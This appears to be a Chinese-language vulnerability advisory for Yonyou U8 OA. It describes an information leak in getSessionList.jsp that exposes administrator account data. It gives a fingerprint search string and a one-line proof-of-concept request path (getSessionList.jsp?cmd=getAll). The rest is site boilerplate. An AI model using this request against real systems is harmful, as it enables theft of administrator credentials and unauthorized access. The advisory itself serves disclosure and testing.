用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

漏洞描述

用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息。

漏洞影响

用友 U8 OA

网络测绘

“用友U8-OA”

漏洞复现

20231206102102105-1645976459870-e87ed43e-2b7e-432d-b0ca-4909d02748be.66f3e232_2023-12-06_10-20-39 (1)

验证POC

/yyoa/ext/https/getSessionList.jsp?cmd=getAll

20231206102222762-1645976484402-84e294eb-dd29-4cfa-b8d7-d7ce7b07a7ce.7a6536ab_2023-12-06_10-21-58 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容